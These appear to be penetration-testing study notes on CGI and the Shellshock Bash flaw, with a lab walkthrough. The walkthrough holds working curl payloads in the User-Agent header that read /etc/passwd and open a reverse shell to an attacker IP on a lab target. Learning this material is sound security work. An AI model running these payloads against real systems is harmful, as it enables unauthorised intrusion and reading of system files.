Skip to content

Attacking CGI Apps Shellshock

  • Common Gateway Interface - CGI - is used to help a web server render dynamic pages and create a customized response for the user making a request via a web application
  • CGI applications are primarily used to access other applications running on a web server. CGI is essentially middleware between web servers, external databases, and information sources. CGI scripts and programs are kept in the /CGI-bin directory on a web server and can be written in C, C++, Java, PERL, etc. CGI scripts run in the security context of the web server.
  • CGI scripts/applications are typically used for a few reasons:
    • If the webserver must dynamically interact with the user
    • When a user submits data to the web server by filling out a form. The CGI application would process the data and return the result to the user via the webserver
      • A graphical depiction of how CGI works can be seen below.
      • Diagram showing CGI program flow: 1. Browser sends URL to server. 2. Server uses CGI to run program. 3. Program runs. 4. Program sends output to server. 5. Server returns output to browser.
  • Broadly, the steps are as follows:
    • A directory is created on the web server containing the CGI scripts/applications. This directory is typically called CGI-bin.
    • The web application user sends a request to the server via a URL, i.e, https://acme.com/cgi-bin/newchiscript.pl
    • The server runs the script and passed the resultant output back to the web client
  • Every CGI program starts a new process for each HTTP request which takes a lot of server memory, a new db connection is opened every time

CGI Attacks

  • Shellshock (Bash Bug) via CGI - https://nvd.nist.gov/vuln/detail/CVE-2014-6271
    • security flaw in the Bash shell (GNU Bash up until version 4.3) that can be used to execute unintentional commands using environment variables.

Shellshock via CGI

  • The Shellshock vulnerability allows an attacker to exploit old versions of Bash that save environment variables incorrectly.
  • env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"
    • to check if its vulnerable

Enum & Attack

  • gobuster dir -u http://10.129.204.231/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi
    • extension -x cgi because the scripts are stored as script.cgi
  • we find a file access.cgi
  • trying to look it up, we see a 200 OK
  • checking if it is vulnerable:
    • curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.129.204.231/cgi-bin/access.cgi
    • send our payload in the user agent
    • can be done using Burp
  • curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.38/7777 0>&1' http://10.129.204.231/cgi-bin/access.cgi
    • getting a reverse shell

Mitigation

  • https://www.digitalocean.com/community/tutorials/how-to-protect-your-server-against-the-shellshock-bash-vulnerability